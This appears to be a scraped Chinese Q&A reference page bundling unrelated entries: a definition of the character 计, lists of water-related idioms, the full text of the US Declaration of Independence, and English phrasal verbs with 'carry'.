计字的笔顺为点、横折提、横、竖。计,汉语一级字 ,读作jì,会意字,最早见于战国 。本义是算账、总计、计算。引申为打算、谋划等义。计,会意字。从言,从十。“十”代表数字,会计算、合计意。在古文字形体演变中竖画上所加饰点常演变为横,为战国楚系文字,所从之“言”旁,亦较为特殊。这种形体是“言”省去竖画的特殊形体。《说文》:“计,会也,筭也。”段玉裁注:“会,合也。筭 ,当作算,数也。” 《左传·昭公三十二年》:“己丑,土弥牟营成周,计丈数,揣高卑。”又引申出计算利害得失之“计”。《战国策·赵策四》:“父母之爱子,则为之计深远。”计的基础释义:1、计算:核~。共~。不~其数。数以万~。 2、测量或计算度数、时间等的仪器:体温~。血压~。晴雨~。 3、主意;策略;计划:~策。巧~。缓兵之~。4、眉头一皱,~上心来。百年大~,质量第一。 5、做计划;打算:设~。为加强安全~,制定了工厂保卫条例。6、 计较;考虑:不~成败。无暇~及。7、 姓。
2023-01-04 01:09:512


upsetday意思是:不安的日子upset英 [ʌpˈset] 美 [ʌpˈsɛt] vi. 打翻,弄翻; 打乱,打搅;vt. 打乱,搅乱; 推翻,弄翻; 使心烦意乱; 使翻倒n. 翻倒,颠覆; 心烦意乱; 混乱;adj. 难过的; 失望的; 沮丧的; (肠胃)不舒服的过去式: upset 过去分词: upset 现在分词: upsetting 第三人称单数: upsets
2023-01-04 01:09:531


1.请你写出几个描写水的词语:(十个) 波澜壮阔 浩浩荡荡 镜花水月 随波逐流 水天一色 汪洋大海 水平如镜 波光粼粼 泛起微波 碧波荡漾 波涛汹涌 波浪滔天 狂涛怒吼 惊涛骇浪 清风徐来、水波不兴。水波粼粼、 风平浪静、碧波荡漾、水趣盎然 波光潋滟、清澈见底、悠悠烟水、 碧波浩渺、琉璃千顷、溪流淙淙、 风起浪涌、白浪滔天、波涛澎湃、 狂风怒潮、黑风巨浪、波翻浪涌、 波涛汹涌、急流飞溅、奔腾咆哮、 水天一色 湖光山色 一江春水 碧水微澜 清澈见底 涓涓细流 潺潺流水 碧波荡漾 波光粼粼 车水马龙 水波不兴 水波粼粼 碧海青山,碧海青天,水木清华,水石清华,水色一天,水中捞月 柔情似水 年华似水 山清水秀,青山绿水 2.请你写五个带水的四字词语 拖泥带水 乐山乐水 牛不喝水 望穿秋水 鸥水相依 高山流水 带水拖泥 大禹治水 沾泥带水 细水长流 万水千山 桃花潭水 桃花流水 汤里来, 判若水火 盘水加剑 爬山涉水 歠菽饮水 逆水行舟 买臣覆水 马水车龙 马如流水 马前泼水 乐山爱水 靠山吃山 积土为山 积水成渊 范水模山 饭蔬饮水 反水不收 大水冲了 打落水狗 残山剩水 餐风宿水 裁云剪水 白水鉴心 白山黑水 跋山涉水 巴山蜀水 淡水交情 海水桑田 海水群飞 海水难量 海水不可 河水不犯 河水不洗 河同水密 涸鲋得水 涸鱼得水 冷水浇背 冷水浇头 马龙车水 萍水相逢 泼冷水 泼水难收 千山万水 千水万山 如蹈水火 如人饮水 如石投水 如水赴壑 如水投石 如鱼得水 如鱼似水 如鱼饮水 若涉渊水 弱水之隔 撒水拿鱼 山崩水竭 山长水阔 山长水远 山肤水豢 山高水长 山高水低 山高水险 山光水色 山寒水冷 山砠水厓 山眉水眼 山明水秀 山清水秀 山穷水断 山穷水尽 山穷水绝 山水相连 山遥水远 山重水复 勺水一脔 剩山残水 剩水残山 十日一水 势如水火 菽水承欢 双瞳剪水 水碧山青 水菜不交 水长船高 水到渠成 水到鱼行 水滴石穿 水底捞月 水底捞针 水底摸月 水底纳瓜 水调歌头 水光山色 水过鸭背 水火兵虫 水火不避 水火不辞 水火不兼 水火不相 水火无情 水火相济 水火之中 水激则旱 水洁冰清 水尽鹅飞 水尽山穷 水晶灯笼 水净鹅飞 水可载舟 水枯石烂 水阔山高 水来土掩 水里纳瓜 水流花落 水流花谢 水流湿, 水流云散 水陆毕陈 水陆杂陈 水落归漕 水落归槽 水落石出 水满金山 水漫金山 水米无干 水米无交 水明山秀 水磨工夫 水母目虾 水木清华 水佩风裳 水清无鱼 水穷山尽 水 *** 融 水软山温 水色山光 水深火热 水剩山残 水石清华 水宿风餐 水宿山行 水天一色 水土不服 水楔不通 水泄不漏 水泄不通 水泄不透 水泄不通 水性杨花 水秀山明 水远山长 水远山遥 水月观音 水月镜花 水则载舟 水涨船高 水至清则 水中捞月 水中著盐 水中捉月 顺水放船 顺水人情 顺水顺风 顺水推船 顺水推舟 顺水行舟 似水流年 似水如鱼 溯水行舟 听风听水 拖人落水 拖人下水 问诸水滨 污泥浊水 无根之木 无源之水 无源之水 宿水餐风 宿水飡风 显山露水 杨花水性 杯水车薪 杯水粒粟 杯水舆薪 杯水之敬 杯水之谢 悲歌易水 车水马龙 臣心如水 趁水和泥 洪水横流 洪水猛兽 背水一战 冰寒于水 冰清水冷 兵来将挡 兵来将敌 兵来将迎 不避水火 不便水土 不服水土 不通水火 不习水土 乘高决水 乘顺水船 尺山寸水 尺水丈波 抽刀断水 出山泉水 出水芙蓉 楚水吴山 啜菽饮水 吹皱一池 春风沂水 撮盐入水 盛水不漏 重山复水 登山临水 登山涉水 滴水不羼 滴水不漏 滴水成冰 滴水成河 滴水穿石 滴水难消 点水不漏 簟纹如水。 3.描写四字词语的是水的描写水的 1 一清如水: 形容为官廉洁,不贪污、不受贿。也形容十分清洁。 2 登山临水: 形容旅途遥远。也指游山玩水。 3 一衣带水: 一条衣带那样狭窄的水。指虽有江河湖海相隔,但距离不远,不足以成为交往的阻碍。 4 高山流水: 比喻知己或知音。也比喻乐曲高妙。 5 山穷水绝: 见“山穷水尽”。 6 浑水摸鱼: 浑水:不清的水。比喻乘混乱的时候从中捞取利益。 7 水阔山高: 阔:宽,广阔,指有广阔的水面和高大的山脉隔着,不得相通。 8 一尺水十丈波: 比喻说话夸张,不真实。 9 饮水栖衡: 喝水充饥,住简陋房屋。形容生活清苦。 10 火热水深: ①犹水深火热。比喻十分困苦的处境。②形容严酷;厉害。
2023-01-04 01:09:571


2023-01-04 01:09:494


THE DECLARATION OF INDEPENDENCE July 4, 1776 In Congress, July 4, 1776, THE UNANIMOUS DECLARATION OF THE THIRTEEN UNITED STATES OF AMERICA When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the Powers of the earth, the separate and equal station to which the Laws of Nature and of Nature"s God entitle them, a decent respect to the opinions of mankind requires that they should declare the causes which impel them to the separation. We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty, and the pursuit of Happiness. That to secure these rights, Governments are instituted among Men, deriving their just powers from the consent of the governed. That whenever any Form of Government becomes destructive of these ends, it is the Right of the People to alter or to abolish it, and to institute new Government, laying its foundation on such principles and organizing its powers in such form, as to the m shall seem most likely to effect their Safety and Happiness. Prudence, indeed, will dictate that Governments long established should not be changed for light and transient causes; and accordingly all experience hath shown, that mankind are more disposed to suffer, while evils are sufferable, than to right themselves by abolishing the forms to which they are accustomed. But when a long train of abuses and usurpations, pursuing invariably the same Object, evinces a design to reduce them under absolute Des potism, it is their right, it is their duty, to throw off such Government, and to provide new Guards for their future security. Such has been the patient sufferance of these Colonies; and such is now the necessity which constrains them to alter their former Systems of Government. The history of the present King of Great Britain is a history of repeated injuries and usurpations, all having in direct object the establishment of an absolute Tyranny over these States. To prove this, let Facts be submitted to a candid world. He has refused his Assent to Laws, the most wholesome and necessary for the public good. He has forbidden his Governors to pass Laws of immediate and pressing importance, unless suspended in their operation till his Assent should be obtained; and when so suspended, he has utterly neglected to attend to them. He has refused to pass other Laws for the accommodation of large districts of people, unless those people would relinquish the right of Representation in the Legislature, a right inestimable to them and formidable to tyrants only. He has called together legislative bodies at places unusual, uncomfortable, and distant from the depository of their public Records, for the sole purpose of fatiguing them into compliance with his measures. He has dissolved Representative Houses repeatedly, for opposing with manly firmness his invasions on the rights of the people. -------------------------------------------------------------------------------- He has refused for a long time, after such dissolutions, to cause others to be elected; whereby the Legislative powers, incapable of Annihilation, have returned to the People at large for their exercise; the State remaining in the mean time exposed to all the dangers of invasion from without, and convulsions within. He has endeavoured to prevent the population of these States; for that purpose obstructing the Laws of Naturalization of Foreigners; refusing to pass others to encourage their migrations hither, and raising the conditions of new Appropriations of Lands . He has obstructed the Administration of Justice, by refusing his Assent to Laws for establishing Judiciary powers. He has made Judges dependent on his Will alone, for the tenure of their offices, and the amount and payment of their salaries. He has erected a multitude of New Offices, and sent hither swarms of Officers to harass our People, and eat out their substance. He has kept among us, in times of peace, Standing Armies without the Consent of our legislatures. He has affected to render the Military independent of and superior to the Civil power. He has combined with others to subject us to a jurisdiction foreign to our constitution, and unacknowledged by our laws; giving his Assent to their Acts of pretended Legislation: For quartering large bodies of armed troops among us: For protecting them, by a mock Trial, from Punishment for any Murders which they should commit on the Inhabitants of these States: For cutting off our Trade with all parts of the world: For imposing Taxes on us without our Consent: For depriving us in many cases, of the benefits of Trial by Jury: For transporting us beyond Seas to be tried for pretended offences: For abolishing the free System of English Laws in a neighbouring Province, establishing therein an Arbitrary government, and enlarging its Boundaries so as to render it at once an example and fit instrument for introducing the same absolute rule into t hese Colonies: For taking away our Charters, abolishing our most valuable Laws, and altering fundamentally the Forms of our Governments: For suspending our own Legislatures, and declaring themselves invested with power to legislate for us in all cases whatsoever. He has abdicated Government here, by declaring us out of his Protection and waging War against us. He has plundered our seas, ravaged our Coasts, burnt our towns, and destroyed the Lives of our people. He is at this time transporting large armies of foreign mercenaries to compleat the works of death, desolation and tyranny, already begun with circumstances of Cruelty & perfidy scarcely paralleled in the most barbarous ages, and totally unworthy the H ead of a civilized nation. He has constrained our fellow Citizens taken Captive on the high Seas to bear Arms against their Country, to become the executioners of their friends and Brethren, or to fall themselves by their Hands. He has excited domestic insurrections amongst us, and has endeavoured to bring on the inhabitants of our frontiers, the merciless Indian Savages, whose known rule of warfare, is an undistinguished destruction of all ages, sexes and conditions. In every stage of these Oppressions We have Petitioned for Redress in the most humble terms: Our repeated Petitions have been answered only by repeated injury. A Prince, whose character is thus marked by every act which may define a Tyrant, is unfit to be the ruler of a free people. Nor have We been wanting in attention to our British brethren. We have warned them from time to time of attempts by their legislature to extend an unwarrantable jurisdiction over us. We have reminded them of the circumstances of our emigration and sett lement here. We have appealed to their native justice and magnanimity, and we have conjured them by the ties of our common kindred to disavow these usurpations, which would inevitably interrupt our connections and correspondence. They too have been deaf t o the voice of justice and of consanguinity. We must, therefore, acquiesce in the necessity, which denounces our Separation, and hold them, as we hold the rest of mankind, Enemies in War, in Peace Friends. We, therefore, the Representatives of the united States of America, in General Congress, Assembled, appealing to the Supreme Judge of the world for the rectitude of our intentions, do, in the Name, and by Authority of the good People of these Colonies, solemnly publish and declare, That these United Colonies are, and of Right ought to be Free and Independent States; that they are Absolved from all Allegiance to the British Crown, and that all political connection between them and the State of Great Bri tain, is and ought to be totally dissolved; and that as Free and Independent States, they have full Power to levy War, conclude Peace, contract Alliances, establish Commerce, and to do all other Acts and Things which Independent States may of right do. An d for the support of this Declaration, with a firm reliance on the Protection of Divine Providence, we mutually pledge to each other our Lives, our Fortunes and our sacred Honor. JOHN HANCOCK, President Attested, CHARLES THOMSON, Secretary New Hampshire: JOSIAH BARTLETT, WILLIAM WHIPPLE, MATTHEW THORNTON Massachusetts-Bay: SAMUEL ADAMS, JOHN ADAMS, ROBERT TREAT PAINE, ELBRIDGE GERRY Rhode Island: STEPHEN HOPKINS, WILLIAM ELLERY Connecticut: ROGER SHERMAN, SAMUEL HUNTINGTON, WILLIAM WILLIAMS, OLIVER WOLCOTT Georgia: BUTTON GWINNETT, LYMAN HALL, GEO. WALTON Maryland: SAMUEL CHASE, WILLIAM PACA, THOMAS STONE, CHARLES CARROLL OF CARROLLTON Virginia: GEORGE WYTHE, RICHARD HENRY LEE, THOMAS JEFFERSON, BENJAMIN HARRISON, THOMAS NELSON, JR., FRANCIS LIGHTFOOT LEE, CARTER BRAXTON. New York: WILLIAM FLOYD, PHILIP LIVINGSTON, FRANCIS LEWIS, LEWIS MORRIS Pennsylvania: ROBERT MORRIS, BENJAMIN RUSH, BENJAMIN FRANKLIN, JOHN MORTON, GEORGE CLYMER, JAMES SMITH, GEORGE TAYLOR, JAMES WILSON, GEORGE ROSS Delaware: CAESAR RODNEY, GEORGE READ, THOMAS M"KEAN North Carolina: WILLIAM HOOPER, JOSEPH HEWES, JOHN PENN South Carolina: EDWARD RUTLEDGE, THOMAS HEYWARD, JR., THOMAS LYNCH, JR., ARTHUR MIDDLETON New Jersey: RICHARD STOCKTON, JOHN WITHERSPOON, FRANCIS HOPKINS, JOHN HART, ABRAHAM CLARK
2023-01-04 01:09:473


  一、描写水的四字词语   清波荡漾 清澈碧透 清澈见底 清澈幽深 清风徐来 清流银波 清溪一带 清莹澄澈 清滢澄澈   秋江如练 群帆渔歌 如歌如诉 如泣如诉 如雪崩泻 如烟如雾 如蚁溃堤 山高水长 山明水秀   山穷水尽 身临其境 深不可测 声如奔雷 声如雷鸣 声似奔雷 声震山岳 水波不兴 水波荡漾   水波粼粼 水澄波静 水滴石穿 水光涟艳 水光潋滟 水花飞溅 水花四溅 水帘悬挂 水流平缓   水流湍急 水流汹涌 水沫飞溅 水平如镜 水趣盎然 水乳交融 水深流缓 水深流急 水声潺潺   水声淙淙 水声丁冬 水势峻急 水天一色 似玉如银 随波逐浪 随风逐浪 碎玉摧冰 滩多水急   涛声如弦 滔滔不绝 腾空而下 天水相接 推波助澜 弯急滩险 蜿蜒而去 蜿蜒曲折 蜿蜒如带   万马奔腾 万倾碧涛 万顷碧波 万顷波光 万顷狂澜 万顷琉璃 万顷烟波 万丈瀑布 汪洋大海   微波不兴 微波荡漾 微波粼粼 微波起伏 微波细浪 温柔恬静 涡流湍急 无风鼓浪 雾海夜航   溪流淙淙 溪水潺潺 细水长流 霞光掩映 小河流水 小桥流水 小溪潺潺 心旷神怡 心醉神驰   行云流水 汹涌澎湃 汹涌湍急 轩然大波 喧腾飞溅 悬河泻水 悬空飞练 旋涡动荡 旋涡翻滚   烟波荡漾 烟波浩淼 烟波浩渺 烟波万里 烟锁长河 烟雨霏霏 遥观远瞰 夜湖美景 一碧如镜   一碧万顷 一波三折 一波万波 一挂飞瀑 一泓碧波 一泓清泉 一泓溪流 一江春水 一平如镜   一丘一壑 一水绕绿 一潭死水 一汪碧水 一汪清水 一泻千里 一衣带水 依山傍水 蚁穴溃堤   暗流涌动 白帆点点 白浪翻滚 白浪滚滚 白浪滔滔 白浪滔天 白浪掀天 白练垂空 白练腾空   白练下垂 白龙出山 白龙下山 白瀑悬空 百川朝海 百川赴海 百川归海 杯水车薪 奔流到海   奔腾不息 奔腾翻卷 奔腾叫啸 奔腾怒吼 奔腾咆哮 奔泻而下 奔泻流淌 碧波荡漾 碧波浩渺   碧波涟漪 碧波粼粼 碧波万顷 碧波掀天 碧波漪澜 碧海翠堤 碧海青天 碧海扬波 碧湖翠堤   碧江盈盈 碧蓝如茵 碧绿澄澈 碧水生辉 波刀浪斧 波谷浪尖 波光涟涟 波光潋滟 波光粼粼   波光明灭 波光桥影 波光闪闪 波光水影 波光塔影 波光摇曳 波澜起伏 波澜壮阔 波浪翻卷   波浪翻腾 波浪接天 波浪排排 波浪滔天 波平浪静 波平如镜 波平似镜 波山浪谷 波涛滚滚   波涛澎湃 波涛汹涌 波纹粼粼 沧海横流 沧海桑田 沧海一粟 层层涟漪 长堤翠柳 长江流域   潮起潮落 潮声澎湃 潮水急涨 潮涌浪翻 潮涨潮落 趁波逐浪 乘风破浪 池水明澈 川流不息   川壅必溃 垂钓之地 春池水涨 春江水暖 大海茫茫 大河奔流 大江大河 大江东去 大江东逝   大浪滔滔 大水滔滔 荡舟小憩 倒影碎裂 滴水不漏 电光飞来 跌宕奔腾 东海鲸波 东流而去   恶浪拍岸 翻江倒海 泛滥成灾 飞花碎玉 飞流直下 飞流坠地 飞瀑倒泻 飞瀑高悬 飞瀑溅珠   飞瀑雷震 飞瀑凌空 飞瀑如练 飞腾而下 飞珠溅玉 风吹潮涌 风狂浪险 风平浪静 浮光跃金   高山大河 高山流水 高崖飞瀑 汩汩流湍 汩汩有声 滚滚东流 滚滚东去 滚滚狂涛 海潮奔涌   海潮澎湃 海潮汹涌 海潮迅猛 海底世界 海沸江翻 海角天涯 海枯石烂 海阔天空 海浪峰涌   海浪惊涛 海面辽阔 海纳百川 海水苍茫 海水深蓝 海水咸苦 海水腥味 海水湛蓝 海涛轰鸣   海涛呼啸 海天相接 海天一色 海天一线 海啸惊人 海啸山崩 昊瀚海天 浩瀚无际 浩浩荡荡   浩浩洪流 浩浩淼淼 河流滚滚 河水暴涨 河水奔流 河水陡涨 河水泛滥 河水滚滚 河水滔滔   荷塘月色 黑波浊浪 轰然下坠 轰然泻下 訇然鸣响 洪波百丈 洪峰如山 洪水猛兽 洪水宣泄   壶口瀑布 湖波荡漾 湖波翻腾 湖波涟涟 湖波拍岸 湖波汹涌 湖翻银波 湖翻银浪 湖光峰影   湖光山色 湖光水色 湖甲如镜 湖柳绕堤 湖灭一色 湖色蒙蒙 湖闪金波 湖水拍岸 湖水柔和   黄海流域 黄河流域 黄金海岸 浑然一体 击楫中流 积水为海 激浪翻滚 激流奔泻 激流跌宕   激流恶浪 激流澎湃 激流勇退 急流滚滚 急流险滩 急流勇进 急滩险流 驾空飞降 溅玉飞雪   江海同归 江河横溢 江河湖泊 江河湖海 江河日下 江宽水急 江流浪涌 江满河溢 江南海北   江清见底 江如罗带 江深流急 江水奔流 江水奔腾 江水浩荡 江水茫茫 江水滔滔 江水湍急   江水汹涌 江涛阵阵 叫静澈底 金波粼粼 金波闪烁 金戈之声 惊雷震天 惊涛骇浪 惊涛裂岸   惊涛怒浪 惊涛拍岸 惊涛似雪 晶莹明澈 鲸波万里 净江如练 九天直下 巨浪滚滚 巨浪拍天   涓涓细流 狂飙横澜 狂波巨澜 狂澜汹涌 狂涛恶浪 浪高风急 浪花朵朵 浪花飞溅 浪花四溅   浪花汹涌 浪静波平 浪静风平 浪恬波静 雷霆万钧 力挽狂澜 涟漪潋滟 莲叶满湖 临池学书   粼粼碧波 粼粼金光 凌空而下 凌空飞下 凌空腾起 凌在飞下 流水潺潺 流水潺湲 流水迟滞
2023-01-04 01:09:411


  下面是我整理的carry的相关的 短语 ,希望对大家有帮助。   1 carry for 为了谁拿什么一般后面家人   2 carry away   3 carry out 执行,实行;贯彻;实现;完成   4 carry on 开展;维持;继续   5 carry to 把什么拿到哪里   6 carry forward 发扬, 结转   7 carry through 帮(某人)渡过难关; 使(某人)保持勇气   8 carry off 夺去;获得;使丧命;成功地处理   9 carry on with (与)…调情;与…有暧昧关系   10 carry about 随身携带   补充:   sth. to carry on with 暂时使用着的东西; 目前正做的事情   carry all before one 势如破竹, 所向披靡, 获得全胜, 取得重大成功   arry everything before one 势如破竹, 所向披靡, 获得全胜, 取得重大成功   carry the world before one 势如破竹, 所向披靡, 获得全胜, 取得重大成功   carry all before it 势如破竹, 所向披靡, 获得全胜, 取得重大成功   carry everything before it 势如破竹, 所向披靡, 获得全胜, 取得重大成功   carry the world before it 势如破竹, 所向披靡, 获得全胜, 取得重大成功   carry along 使人佩服   carry away   (1)运[搬, 带]走   (2)   [一般用被动态]使着迷, 使陶醉, 使神魂颠倒, 受感动, 使失去自制力   (3)【航海】(风暴)刮断..., 水冲走...   (4)赢得(奖品等)   carry back   (1)运[拿, 带]回   (2)使回想起   carry down   (1)搬下, 取下   (2)滚入, 结转(帐目); 诱使承受   carry forward   (1)发扬, 使进行; 推进, 发展(业务等)   (2)结转, 转入(下页, 下期等)   carry high and dry 戏弄(某人), 逗恼(某人)   carry sb. high and dry 戏弄(某人), 逗恼(某人)   carry it 获胜; 占优势   carry it off   (1)移到远处   (2)杀死   (3)顺利地应付过去   carry off   (1)运走, 移走   (2)夺走, 拐走, 抢走   (3)得(奖)   (4)(成功地)对付, (若无其事地)应付   carry on   (1)继续开展, 进行下去   (2)经营, 处理   (3)感情冲动, 大哭大闹   (4)(with)与...有暧昧关系; 调情   carry oneself well 举止文雅, 彬彬有礼   carry oneself gracefully 举止文雅, 彬彬有礼   carry out   (1)开展, 实现, 完成, 进行到底   (2)贯彻, 执行, 落实   carry over   (1)贮存(货物等)供下一季供应   (2)把(帐目)结转(次页); [英](在证券交易中)将...转期交割   (3)(从前一阶段或领域等)遗留下来, 继续下去   (4)延期   carry sth. too far 把某事做得过分, 走极端   carry through   (1)贯彻, 完成, 进行到底   (2)维持, 使渡过难关   carry up   (1)建高(房屋)   (2)追溯   carry with one   (1)随身携带   (2)在记忆中保留(某事, 某人)
2023-01-04 01:09:411